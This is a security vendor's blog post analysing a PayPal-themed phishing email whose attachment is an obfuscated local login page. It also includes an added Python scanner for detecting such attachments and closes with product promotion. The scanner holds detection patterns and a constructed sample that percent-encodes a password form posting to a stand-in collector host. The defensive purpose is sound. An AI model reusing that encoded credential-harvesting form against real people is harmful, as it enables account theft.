Phishing scams have been around for over twenty years. It appears unlikely that they will ever go away. Targeting anyone with an email address, they continue to be a persistent threat. Recently, even some of Check Point’s executives were targeted.
The email below, purportedly from PayPal, is an example of what potential victims receive. Fortunately, in this particular case it was blocked by Check Point’s Anti-Spam & Email Security Software Blade.
Phishing scam using PayPal as the hook
The approach is simple: the email states that someone tried to access the person’s account, and he should therefore verify his account by downloading and opening the attachment.
Compared to other, more sophisticated phishing campaigns, this one is relatively simple, but unfortunately many users have fallen for it because of its “official” appearance.
Phishing scammers succeed because they effectively imitate things that are familiar to us – things like common services (like PayPal), invoices and resumes. Despite increased employee education and awareness, the success rate for phishing scams remains relatively high. According to Verizon’s 2016 Data Breach Investigations Report, 30% of phishing messages were opened by the target across all campaigns.
Infiltrating through security
The attacker behind this phishing attempt employed several different techniques in an attempt to get past security measures.
- Using a local phishing site instead of an internet site:
Online phishing pages, i.e. bogus sites masquerading as the legitimate item, are an outdated tactic easily identified by security vendors. For this reason, the attackers did not upload their phishing site to the internet. Instead, they used an email attachment and gave the victim an incentive to open it.
- Obfuscating the phishing site:
Some vendors are capable of blocking local phishing sites by tracing the URL. If the detected URL is suspicious, the phishing attempt is blocked. By obfuscating the webpage, the attackers hope to deceive these security measures and prevent them from inspecting the page.
- Validating the data that is entered into the phishing form:
A known tactic to combat phishing scams is to enter false credentials to understand where the data is sent or to flood the attackers with invalid credentials. To avoid both of these defensive measures, the attackers validate the credentials entered into the phishing form before sending them to their servers.
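From the defender's side, the first two techniques leave traces a mail filter can look for. The following is an added example, not Check Point's code or method: it flags HTML attachments that contain script decoding calls or a percent-encoded blob, peels one encoding layer, and checks the result for a password field or a form that posts to a remote host. The indicator list, the `unescape`-style encoding, the file name and the `example.invalid` host are assumptions made for illustration.

```python
import re
from email import message_from_string
from email.message import EmailMessage
from urllib.parse import unquote

# Script primitives often used to unpack a hidden page (assumed indicator list).
DECODERS = re.compile(r"unescape\(|atob\(|String\.fromCharCode|eval\(|document\.write\(")
PASSWORD_FIELD = re.compile(r"<input[^>]+type=[\"']?password", re.I)
REMOTE_FORM = re.compile(r"<form[^>]+action=[\"']?https?://", re.I)
ENCODED_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}){20,}")  # long %XX run

def scan_html(html):
    """Return the set of findings for one HTML attachment body."""
    findings = set()
    if DECODERS.search(html):
        findings.add("script-decoder")
    # Peel one layer of percent-encoding so hidden markup becomes visible.
    layers = [html] + [unquote(m.group(0)) for m in ENCODED_RUN.finditer(html)]
    if len(layers) > 1:
        findings.add("encoded-blob")
    for layer in layers:
        if PASSWORD_FIELD.search(layer):
            findings.add("password-field")
        if REMOTE_FORM.search(layer):
            findings.add("remote-form-action")
    return findings

def scan_message(raw):
    """Map each HTML attachment's filename in a raw message to its findings."""
    results = {}
    for part in message_from_string(raw).walk():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html"))
        if is_html and part.get_content_disposition() == "attachment":
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            results[name] = scan_html(body)
    return results

def build_sample():
    """Constructed sample message carrying an encoded local login form."""
    hidden = '<form action="https://collector.example.invalid/p"><input type="password" name="p"></form>'
    blob = "".join("%%%02X" % b for b in hidden.encode())
    page = "<script>document.write(unescape('" + blob + "'))</script>"
    msg = EmailMessage()
    msg["Subject"] = "Verify your account"
    msg.set_content("Open the attached form.")
    msg.add_attachment(page.encode(), maintype="text", subtype="html", filename="verify.html")
    return msg.as_string()
```

Findings such as these are scoring signals rather than verdicts, since legitimate HTML attachments occasionally use the same script calls.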
So how did we protect ourselves (and how can you do the same)?
This particular phishing attempt emphasizes the need for advanced security measures that can protect you from phishing scams, as well as for educating employees to be cautious when opening emails. As seen here, phishing has developed evasive techniques that could easily bypass low-level security solutions.
The Check Point Anti-Spam & Email Security Software Blade protects customers from falling victim to such scams. Its multidimensional approach protects email infrastructure, provides highly accurate anti-spam coverage, and defends organizations from a wide variety of virus and malware threats delivered within email. In addition, SandBlast™ Agent with Zero Phishing™ technology protects organizations from new and unknown phishing sites, as well as from threats contained in documents and links delivered via email.